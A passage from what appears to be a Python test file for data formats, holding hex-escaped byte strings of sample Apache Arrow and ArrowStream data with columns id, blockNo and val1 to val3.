x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
],
},
'ArrowStream' : {
'data_sample' : [
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x